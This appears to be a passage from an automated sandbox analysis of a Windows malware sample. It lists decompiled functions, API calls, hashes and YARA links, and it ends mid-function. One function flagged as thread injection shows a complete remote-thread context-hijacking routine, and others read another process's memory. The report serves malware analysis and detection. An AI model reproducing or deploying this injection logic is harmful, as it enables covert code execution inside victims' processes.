					_t81 = _t78 + 0x18;
					if(_t44 != 0) {
						_t86 = _v24 - 4;
						if(_v24 == 4) {
							_t46 = E00AB20D2(_t59, _t62, _t86,  *_t68, _v20, _v16,  &_v28, 4); // executed
							_t82 = _t81 + 0x14;
							if(_t46 != 0) {
								_t66 = 0x1770;
								asm("cdq");
								_v36 =  &_v1276;
								_v32 = _t62;
								do {
									ResumeThread( *(_t68 + 4)); // executed
									Sleep(0x12c); // executed
									SuspendThread( *(_t68 + 4)); // executed
									_push(_v32);
									_t66 = _t66 - 0x12c;
									_push(_v36);
									asm("cdq");
									_push(_t62);
									_push( *(_t68 + 4));
									_t51 = _v40;
									_push(0);
									_push(2);
									_push( *((intOrPtr*)(_t51 + 4)));
									_push( *_t51);
									E00AB3760();
									_t82 = _t82 + 0x20;
								} while (_t66 > 0 && (_v1028 != _v20 || _v1024 != _v16));
								_t91 =  *((intOrPtr*)(_t58 + 0x10));
								if( *((intOrPtr*)(_t58 + 0x10)) == 0) {
									_t53 = E00AB3309(_t59, _t62, _t68,  *((intOrPtr*)(_t58 + 0xc)));
								} else {
									_t53 = E00AB1B12(_t58, _t62, _t68, 0); // executed
								}
								_pop(_t61);
								_t64 = _t53;
								E00AB20D2(_t61, _t62, _t91,  *_t68, _v20, _v16,  &_v44, 4); // executed
							}
						}
					}
				}
				return _t64;
			}

0x00ab220d
0x00ab220e
0x00ab2210
0x00ab2211
0x00ab221c
0x00ab2229
0x00ab2235
0x00ab223f
0x00ab2242
0x00ab2247
0x00ab224c
0x00ab224f
0x00ab2256
0x00ab2262
0x00ab2267
0x00ab226c
0x00ab2284
0x00ab2289
0x00ab228e
0x00ab2294
0x00ab2298
0x00ab22ac
0x00ab22b1
0x00ab22b6
0x00ab22c2
0x00ab22c7
0x00ab22c8
0x00ab22cb
0x00ab22ce
0x00ab22d1
0x00ab22dc
0x00ab22e5
0x00ab22eb
0x00ab22f1
0x00ab22f7
0x00ab22fa
0x00ab22fb
0x00ab22fc
0x00ab22fd
0x00ab2300
0x00ab2302
0x00ab2304
0x00ab2307
0x00ab2309
0x00ab230e
0x00ab2311
0x00ab232b
0x00ab232f
0x00ab233f
0x00ab2331
0x00ab2334
0x00ab2334
0x00ab2345
0x00ab2348
0x00ab2356
0x00ab235b
0x00ab22b6
0x00ab2298
0x00ab228e
0x00ab2368

APIs

memset.NTDLL ref: 00AB2242

Part of subcall function 00AB3255: GetCurrentProcessId.KERNEL32(00000008,?,00000000,00AB33B9,?,00000000,000004D0,00000008,00000000), ref: 00AB3267
Part of subcall function 00AB3255: OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00AB33B9,?,00000000,000004D0,00000008,00000000), ref: 00AB3274
Part of subcall function 00AB3255: FindCloseChangeNotification.KERNELBASE(00000000,000004D0,00000008,00000000), ref: 00AB32C3

Part of subcall function 00AB20D2: GetCurrentProcessId.KERNEL32(00000000,?), ref: 00AB20F2
Part of subcall function 00AB20D2: OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00AB20FF

ResumeThread.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00AB22D1
Sleep.KERNELBASE(0000012C,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00AB22DC
SuspendThread.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00AB22E5

Memory Dump Source

Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Process$CurrentOpenThread$ChangeCloseFindNotificationResumeSleepSuspendmemset
String ID:
API String ID: 3650241253-0
Opcode ID: eb51bea2842415bbc1f80a840567b6e84ce24936ab750189591bb4baff2a6f31
Instruction ID: c00cb70ca71e01dfb3a9cad0976561bfa891900d48a6f9f2dfc7a8f9d9c6eebb
Opcode Fuzzy Hash: eb51bea2842415bbc1f80a840567b6e84ce24936ab750189591bb4baff2a6f31
Instruction Fuzzy Hash: 7B4162B6D00105EFDF11AF94CD02FEEBBB9FB04310F140165FA14A61A2E7359A51DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00AB2A4E, Relevance: 2.6, APIs: 2, Instructions: 76
memoryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00AB2A4E(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t32;
				intOrPtr* _t40;
				intOrPtr _t44;
				void* _t46;
				long _t52;
				void* _t54;
				void* _t55;
				intOrPtr _t56;
				void* _t57;
				void* _t58;
				void* _t59;
				void* _t60;

				_t60 = __eflags;
				_push(0x28);
				_push(0xab5468);
				E00AB1000(__ebx, __edi, __esi);
				asm("xorps xmm0, xmm0");
				asm("movlpd [ebp-0x38], xmm0");
				_t54 = 0;
				_t32 = E00AB2C02(__ecx, _t60,  *((intOrPtr*)(_t57 + 8)),  *((intOrPtr*)(_t57 + 0xc)), _t57 - 0x30, _t57 - 0x20); // executed
				_t59 = _t58 + 0x10;
				if(_t32 != 0) {
					L7:
					if(_t54 != 0) {
						VirtualFree(_t54, 0, 0x8000); // executed
					}
					L9:
					return E00AB103B( *((intOrPtr*)(_t57 - 0x38)));
				}
				_t52 =  *(_t57 - 0x20);
				_t36 = VirtualAlloc(_t32, _t52, 0x3000, 4); // executed
				_t55 = _t36;
				 *(_t57 - 0x20) = _t55;
				if(_t55 == 0) {
					goto L9;
				}
				 *(_t57 - 0x1c) = _t36;
				_t44 =  *((intOrPtr*)(_t57 - 0x30));
				 *((intOrPtr*)(_t57 - 0x28)) = _t44;
				_t56 =  *((intOrPtr*)(_t57 - 0x2c));
				 *((intOrPtr*)(_t57 - 0x24)) = _t56;
				_t46 = 0x1000;
				do {
					E00AB31D4(_t46,  *((intOrPtr*)(_t57 + 8)), _t57 - 0x28, _t36, _t46); // executed
					_t59 = _t59 + 0x10;
					_t46 = 0x1000;
					_t36 =  *(_t57 - 0x1c) + 0x1000;
					 *(_t57 - 0x1c) =  *(_t57 - 0x1c) + 0x1000;
					_t44 = _t44 + 0x1000;
					 *((intOrPtr*)(_t57 - 0x28)) = _t44;
					asm("adc esi, 0x0");
					 *((intOrPtr*)(_t57 - 0x24)) = _t56;
					_t52 = _t52 - 0x1000;
					_t63 = _t52;
				} while (_t52 != 0);
				 *(_t57 - 4) =  *(_t57 - 4) & _t52;
				_t54 =  *(_t57 - 0x20);
				_t40 = E00AB414A(_t44, _t63, _t54,  *((intOrPtr*)(_t57 + 0x10)));
				if(_t40 != 0) {
					asm("adc ecx, [ebp-0x2c]");
					 *((intOrPtr*)(_t57 - 0x38)) =  *_t40 +  *((intOrPtr*)(_t57 - 0x30));
					 *((intOrPtr*)(_t57 - 0x34)) = 0;
				}
				 *(_t57 - 4) =  *(_t57 - 4) | 0xffffffff;
				goto L7;
			}

0x00ab2a4e
0x00ab2a4e
0x00ab2a50
0x00ab2a55
0x00ab2a5a
0x00ab2a5d
0x00ab2a62
0x00ab2a72
0x00ab2a77
0x00ab2a7c
0x00ab2b1b
0x00ab2b1d
0x00ab2b27
0x00ab2b27
0x00ab2b2d
0x00ab2b38
0x00ab2b38
0x00ab2a89
0x00ab2a8e
0x00ab2a94
0x00ab2a96
0x00ab2a9b
0x00000000
0x00000000
0x00ab2aa1
0x00ab2aa4
0x00ab2aa7
0x00ab2aaa
0x00ab2aad
0x00ab2ab0
0x00ab2ab5
0x00ab2abe
0x00ab2ac3
0x00ab2ac6
0x00ab2ace
0x00ab2ad0
0x00ab2ad3
0x00ab2ad5
0x00ab2ad8
0x00ab2adb
0x00ab2ade
0x00ab2ade
0x00ab2ade
0x00ab2ae2
0x00ab2ae5
0x00ab2aec
0x00ab2af5
0x00ab2afe
0x00ab2b01
0x00ab2b04
0x00ab2b04
0x00ab2b07
0x00000000

APIs

Part of subcall function 00AB2C02: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,00000000,000004D0,00000008,00000000), ref: 00AB2C30
Part of subcall function 00AB2C02: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00AB2C6B
Part of subcall function 00AB2C02: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00AB2C7B
Part of subcall function 00AB2C02: lstrcmpiA.KERNEL32(?,00000000), ref: 00AB2CB9
Part of subcall function 00AB2C02: StrChrA.SHLWAPI(?,0000002E), ref: 00AB2CC8
Part of subcall function 00AB2C02: lstrcmpiA.KERNEL32(?,00000000), ref: 00AB2CDB
Part of subcall function 00AB2C02: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00AB2D25

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,00000000,000004D0,00000008,00000000), ref: 00AB2A8E

Part of subcall function 00AB31D4: GetModuleHandleW.KERNEL32(NTDLL.DLL,ZwWow64ReadVirtualMemory64,00000000,?,?,?,00AB358B,00000008,?,00000000,00000028,00000100,00000000,00000200), ref: 00AB31F8
Part of subcall function 00AB31D4: GetProcAddress.KERNEL32(00000000), ref: 00AB31FF
Part of subcall function 00AB31D4: NtWow64ReadVirtualMemory64.NTDLL(00000028,00000000,?,?,00000008,00000000,00000028,00000000,?,?,?,00AB358B,00000008,?,00000000,00000028), ref: 00AB3227

VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,000004D0,00000008,00000000), ref: 00AB2B27

Memory Dump Source

Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Virtual$AllocFree$lstrcmpi$AddressHandleMemory64ModuleProcReadWow64
String ID:
API String ID: 3389612928-0
Opcode ID: fa05edb04533295c83f0c4bf91598457abf5fca66ae858b986b80dd74f1c2d04
Instruction ID: 8fc8c64266fcf6fe4f031a1b0c89be7b443ed3ae7159d4d759da846264b98ca5
Opcode Fuzzy Hash: fa05edb04533295c83f0c4bf91598457abf5fca66ae858b986b80dd74f1c2d04
Instruction Fuzzy Hash: 74212872D01218ABDF15DFA4DD41BEEBBB8BF08710F14422AF904B7282DA3499418B90

Uniqueness

Uniqueness Score: -1.00%

Function 00AB2961, Relevance: 2.5, APIs: 2, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E00AB2961(void* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				void* _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t26;
				void* _t27;

				_t25 = __edx;
				_t24 = __ecx;
				_t26 = 8;
				_t27 = E00AB1490(0x318);
				if(_t27 != 0) {
					memset(_t27, 0, 0x318);
					asm("cdq");
					 *((intOrPtr*)(_t27 + 8)) = _a8;
					 *((intOrPtr*)(_t27 + 0xc)) = _t25;
					asm("cdq");
					 *((intOrPtr*)(_t27 + 0x10)) = _a12;
					 *((intOrPtr*)(_t27 + 0x14)) = _t25;
					if((_a16 & 0x00000010) != 0 || ( *0xb16d44 & 0x00000001) == 0) {
						_push(_a16);
						_t21 = E00AB2ED8(_t25, _a4, _t27);
					} else {
						_push(_a16);
						_push(_t27);
						_push(_a4);
						_t21 = E00AB3383(_t24, _t25); // executed
					}
					_t26 = _t21;
					LocalFree(_t27);
				}
				return _t26;
			}

0x00ab2961
0x00ab2961
0x00ab2969
0x00ab2975
0x00ab2979
0x00ab297f
0x00ab298e
0x00ab298f
0x00ab2995
0x00ab2998
0x00ab2999
0x00ab299c
0x00ab299f
0x00ab29b8
0x00ab29bf
0x00ab29aa
0x00ab29aa
0x00ab29ad
0x00ab29ae
0x00ab29b1
0x00ab29b1
0x00ab29c7
0x00ab29ca
0x00ab29ca
0x00ab29d5

APIs

Part of subcall function 00AB1490: LocalAlloc.KERNEL32(00000000,?,00AB29EC,00000104,00000000,00000000,00AB14C8,00000000,?,00AB28A0,00000000,00B16D50,?,?,?,00AB14C8), ref: 00AB1496

memset.NTDLL ref: 00AB297F
LocalFree.KERNEL32(00000000), ref: 00AB29CA

Part of subcall function 00AB3383: memset.NTDLL ref: 00AB33AF
Part of subcall function 00AB3383: memcpy.NTDLL(?,00AB37D1,00000100,?,00000000,000004D0,00000008,00000000), ref: 00AB33DA
Part of subcall function 00AB3383: VirtualAllocEx.KERNELBASE(?,00000000,00000318,00003000,00000040,?,?,?,?,00000008,00000000), ref: 00AB33F4

Memory Dump Source

Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocLocalmemset$FreeVirtualmemcpy
String ID:
API String ID: 2149420209-0
Opcode ID: 913694e5e0e983444a46858db300fc0a5c2eb07aa1774c1e703d19ec1afe705c
Instruction ID: bcb136341b5c4031a31073a74baeeb0fe01908ddd66824fdedfbd7dd3839cb4a
Opcode Fuzzy Hash: 913694e5e0e983444a46858db300fc0a5c2eb07aa1774c1e703d19ec1afe705c
Instruction Fuzzy Hash: 97017C715027186BDB219F19DD01BDB7F9CEF853A4F004826FC4896252D661DD5487A1

Uniqueness

Uniqueness Score: -1.00%

Function 00AB1F93, Relevance: 1.4, APIs: 1, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00AB1F93(void* __edx, intOrPtr _a4, void* _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				void _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v44;
				char _v56;
				void* _t38;
				intOrPtr _t42;
				void* _t44;
				void* _t48;
				void _t59;
				void* _t63;
				void* _t66;
				signed int _t67;
				intOrPtr _t72;
				void* _t74;

				asm("xorps xmm0, xmm0");
				asm("movlpd [ebp-0x14], xmm0");
				_t72 = 0xc000009a;
				_t74 = E00AB1490(0x1000);
				if(_t74 == 0) {
					L17:
					_t59 = _v24;
					_v16 = _v20;
					L12:
					_t38 = _a8;
					 *_t38 = _t59;
					 *((intOrPtr*)(_t38 + 4)) = _v16;
					if(_t74 != 0) {
						LocalFree(_t74);
					}
					return _t72;
				}
				_t73 = _a4;
				_t42 = E00AB2B9D(_a4,  &_v32); // executed
				_v8 = _t42;
				_pop(_t63);
				if(_t42 < 0) {
					_t72 = _t42;
					goto L17;
				}
				_t44 = E00AB3236(_t63, _t73, _v32, _v28, _t74, 0x1000,  &_v12); // executed
				if(_t44 == 0) {
					L15:
					_t72 = _v8;
					goto L17;
				}
				asm("cdq");
				asm("adc edx, [ebp-0x18]");
				_t48 = E00AB3236(_t63, _t73,  *((intOrPtr*)(_t74 + 0x3c)) + _v32, __edx, _t74, 0x1000,  &_v12); // executed
				if(_t48 == 0) {
					goto L15;
				}
				_t59 =  *((intOrPtr*)(_t74 + 0x28)) + _v32;
				asm("adc ecx, [ebp-0x18]");
				_v16 = 0;
				_v20 = 0x8664;
				_t66 =  ==  ? 0xd0 : 0xc0;
				_t70 =  *((intOrPtr*)(0xc0 + _t74));
				if( *((intOrPtr*)(0xc0 + _t74)) != 0 &&  *((intOrPtr*)(0xc0 + _t74 + 4)) != 0) {
					asm("adc eax, [ebp-0x18]");
					if(E00AB3236(_t66, _t73, _t70 + _v32, 0,  &_v56, 0x18,  &_v12) != 0 && _v44 != 0 && E00AB3236(_t66, _t73, _v44, 0, _t74, 0x1000,  &_v12) != 0) {
						_t67 =  *(_t74 + 4);
						if(( *_t74 | _t67) != 0) {
							_t59 =  *_t74;
							_v16 = _t67;
						}
					}
				}
				_t72 = _v8;
				goto L12;
			}

0x00ab1f9c
0x00ab1fa5
0x00ab1faa
0x00ab1fb4
0x00ab1fb8
0x00ab20c7
0x00ab20ca
0x00ab20cd
0x00ab20a2
0x00ab20a2
0x00ab20a5
0x00ab20aa
0x00ab20af
0x00ab20b2
0x00ab20b2
0x00ab20bf
0x00ab20bf
0x00ab1fbe
0x00ab1fc6
0x00ab1fcb
0x00ab1fcf
0x00ab1fd2
0x00ab20c5
0x00000000
0x00ab20c5
0x00ab1fe5
0x00ab1fef
0x00ab20c0
0x00ab20c0
0x00000000
0x00ab20c0
0x00ab1ffc
0x00ab2001
0x00ab2008
0x00ab2012
0x00000000
0x00000000
0x00ab201d
0x00ab2024
0x00ab2027
0x00ab202f
0x00ab203d
0x00ab2040
0x00ab2045
0x00ab205d
0x00ab206d
0x00ab2093
0x00ab2098
0x00ab209a
0x00ab209c
0x00ab209c
0x00ab2098
0x00ab206d
0x00ab209f
0x00000000

APIs

Part of subcall function 00AB1490: LocalAlloc.KERNEL32(00000000,?,00AB29EC,00000104,00000000,00000000,00AB14C8,00000000,?,00AB28A0,00000000,00B16D50,?,?,?,00AB14C8), ref: 00AB1496

LocalFree.KERNEL32(00000000,00001000,00000000,?,?,?,?,?,?,?,00AB2267,?,?,?,00000000,000004D0), ref: 00AB20B2

Memory Dump Source

Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Local$AllocFree
String ID:
API String ID: 2012307162-0
Opcode ID: 4116a0574af6c4c864dd6130e2e4ef617dc9553a17d6596350f5c70521ca211f
Instruction ID: 9c4a2a60035e901a190219c83c936f99fe671f2ac32b096daabd3b9e605f2a42
Opcode Fuzzy Hash: 4116a0574af6c4c864dd6130e2e4ef617dc9553a17d6596350f5c70521ca211f
Instruction Fuzzy Hash: 04414F72900209AFDB10EB99CD81BFFB7BDEF48354F54445AE904A7242E735AE41CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00AB2B11, Relevance: 1.3, APIs: 1, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00AB2B11() {
				void* _t11;
				void* _t12;

				 *(_t12 - 4) =  *(_t12 - 4) | 0xffffffff;
				_t11 =  *(_t12 - 0x20);
				if(_t11 != 0) {
					VirtualFree(_t11, 0, 0x8000); // executed
				}
				return E00AB103B( *((intOrPtr*)(_t12 - 0x38)));
			}

0x00ab2b14
0x00ab2b18
0x00ab2b1d
0x00ab2b27
0x00ab2b27
0x00ab2b38

APIs

VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,000004D0,00000008,00000000), ref: 00AB2B27

Memory Dump Source

Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: ea9ab400598b0138d641d03f5857a29d7d3bdf6722f55acafe0f9d10735ea652
Instruction ID: c677d51b2d456fa6c876640102e3c251f15997f5d478d17318ea6a3ecddd784a
Opcode Fuzzy Hash: ea9ab400598b0138d641d03f5857a29d7d3bdf6722f55acafe0f9d10735ea652
Instruction Fuzzy Hash: 83D06734D02659ABDB21EB94DD06B8EBB35BF04720FA04340E95077291C7246E418A84

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00AB2ED8, Relevance: 15.1, APIs: 10, Instructions: 93
threadnativeinjectionCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00AB2ED8(void* __edx, void* _a4, void* _a8) {
				long _v8;
				void _v540;
				intOrPtr _v548;
				void _v720;
				struct _CONTEXT _v724;
				void* _t28;
				void* _t34;
				void* _t48;
				void* _t51;
				void* _t52;
				void** _t53;
				long _t54;

				_t51 = __edx;
				_t54 = 0;
				memset( &_v720, 0, 0x2c8);
				_t53 = _a4;
				_v724 = 0x10003;
				_t28 = VirtualAllocEx( *_t53, 0, 0x318, 0x3000, 0x40);
				_a4 = _t28;
				if(_t28 == 0) {
					L10:
					_t54 = GetLastError();
					L11:
					return _t54;
				}
				if(NtGetContextThread(_t53[1],  &_v724) >= 0) {
					_t48 = _a8;
					 *_t48 = _v540;
					_t34 = _a4;
					_v548 = _t34;
					_v540 = _t34 + 0x218;
					 *((intOrPtr*)(_t48 + 4)) = 0;
					memcpy(_t48 + 0x218, E00AB37F6, 0x100);
					asm("cdq");
					if( *((intOrPtr*)(_t48 + 0x10)) != _t48 + 0x18) {
						_t52 = _a4;
					} else {
						_t52 = _a4;
						if( *((intOrPtr*)(_t48 + 0x14)) == _t51) {
							 *((intOrPtr*)(_t48 + 0x10)) = _t52 + 0x18;
							asm("adc ecx, esi");
							 *((intOrPtr*)(_t48 + 0x14)) = 0;
						}
					}
					if(WriteProcessMemory( *_t53, _t52, _t48, 0x318,  &_v8) == 0) {
						goto L10;
					} else {
						if(NtSetContextThread(_t53[1],  &_v724) < 0) {
							goto L2;
						}
						ResumeThread(_t53[1]);
						Sleep(0x1f4);
						SuspendThread(_t53[1]);
						goto L11;
					}
				}
				L2:
				_t54 = 5;
				goto L11;
			}

0x00ab2ed8
0x00ab2ee8
0x00ab2ef2
0x00ab2ef7
0x00ab2efd
0x00ab2f16
0x00ab2f1c
0x00ab2f21
0x00ab2ff3
0x00ab2ff9
0x00ab2ffc
0x00ab3002
0x00ab3002
0x00ab2f39
0x00ab2f4a
0x00ab2f57
0x00ab2f59
0x00ab2f5c
0x00ab2f67
0x00ab2f74
0x00ab2f77
0x00ab2f82
0x00ab2f86
0x00ab2fa1
0x00ab2f88
0x00ab2f8b
0x00ab2f8e
0x00ab2f97
0x00ab2f9a
0x00ab2f9c
0x00ab2f9c
0x00ab2f8e
0x00ab2fba
0x00000000
0x00ab2fbc
0x00ab2fce
0x00000000
0x00000000
0x00ab2fd7
0x00ab2fe2
0x00ab2feb
0x00000000
0x00ab2feb
0x00ab2fba
0x00ab2f3b
0x00ab2f3d
0x00000000

APIs

memset.NTDLL ref: 00AB2EF2
VirtualAllocEx.KERNEL32(?,00000000,00000318,00003000,00000040,?,00000008,00000000), ref: 00AB2F16
NtGetContextThread.NTDLL ref: 00AB2F31
memcpy.NTDLL(?,00AB37F6,00000100,00000000,?,00000008,00000000), ref: 00AB2F77
WriteProcessMemory.KERNEL32(?,?,?,00000318,00AB2EC6,?,?,00000000,?,00000008,00000000), ref: 00AB2FB1
NtSetContextThread.NTDLL ref: 00AB2FC6
ResumeThread.KERNEL32(?,?,00000000,?,00000008,00000000), ref: 00AB2FD7
Sleep.KERNEL32(000001F4,?,00000000,?,00000008,00000000), ref: 00AB2FE2
SuspendThread.KERNEL32(?,?,00000000,?,00000008,00000000), ref: 00AB2FEB
GetLastError.KERNEL32(?,00000008,00000000), ref: 00AB2FF3

Memory Dump Source

Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Thread$Context$AllocErrorLastMemoryProcessResumeSleepSuspendVirtualWritememcpymemset
String ID:
API String ID: 1761926231-0
Opcode ID: 5828b25aa73a5393a7ee00249612fd235b91f856baf389ba8bf59883d0fbc071
Instruction ID: 91182f3a4e3adee13bd4075468ea4d9e493f5a687a270d7516f703345eebe2d3
Opcode Fuzzy Hash: 5828b25aa73a5393a7ee00249612fd235b91f856baf389ba8bf59883d0fbc071
Instruction Fuzzy Hash: D3313871A40619AFDB11DFA4DC89BEA7BB8FF08340F004266F9089A166D770DA61CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 00AB2B39, Relevance: 4.5, APIs: 3, Instructions: 39
nativeCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00AB2B39(void* _a4) {
				long _v8;
				void* _v28;
				char _v32;
				void _v512;
				void _v520;
				char* _t13;
				int _t19;

				_t19 = 0;
				memset( &_v520, 0, 0x1e8);
				_t13 =  &_v32;
				__imp__ZwQueryInformationProcess(_a4, 0, _t13, 0x18,  &_v8);
				if(_t13 >= 0) {
					ReadProcessMemory(_a4, _v28,  &_v520, 0x1e8,  &_v8);
					_t19 =  !=  ? _v512 : 0;
				}
				return _t19;
			}

0x00ab2b4f
0x00ab2b54
0x00ab2b62
0x00ab2b6a
0x00ab2b72
0x00ab2b86
0x00ab2b8e
0x00ab2b8e
0x00ab2b9c

APIs

memset.NTDLL ref: 00AB2B54
ZwQueryInformationProcess.NTDLL(00000000,00000000,?,00000018,?,?,00000000,00000000), ref: 00AB2B6A
ReadProcessMemory.KERNEL32(00000000,00AB1D0E,?,000001E8,?,?,00000000,00000000), ref: 00AB2B86

Memory Dump Source

Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Process$InformationMemoryQueryReadmemset
String ID:
API String ID: 248391229-0
Opcode ID: b32156eebb5d02aca436d5dc672656c7fdae7d490184b5d4378048edd44c417d
Instruction ID: 1cf492b8aa2cc59f7b2d1c92512899088b5626e191195f2126e4d0d8a77c7b53
Opcode Fuzzy Hash: b32156eebb5d02aca436d5dc672656c7fdae7d490184b5d4378048edd44c417d
Instruction Fuzzy Hash: 45F0F47290012DBBDB10EA95DD09EEFBBBCEF45750F4041A1BE08D2051D7309A159BE0

Uniqueness

Uniqueness Score: -1.00%

Function 00AB126D, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00AB126D(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0xb16da0; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
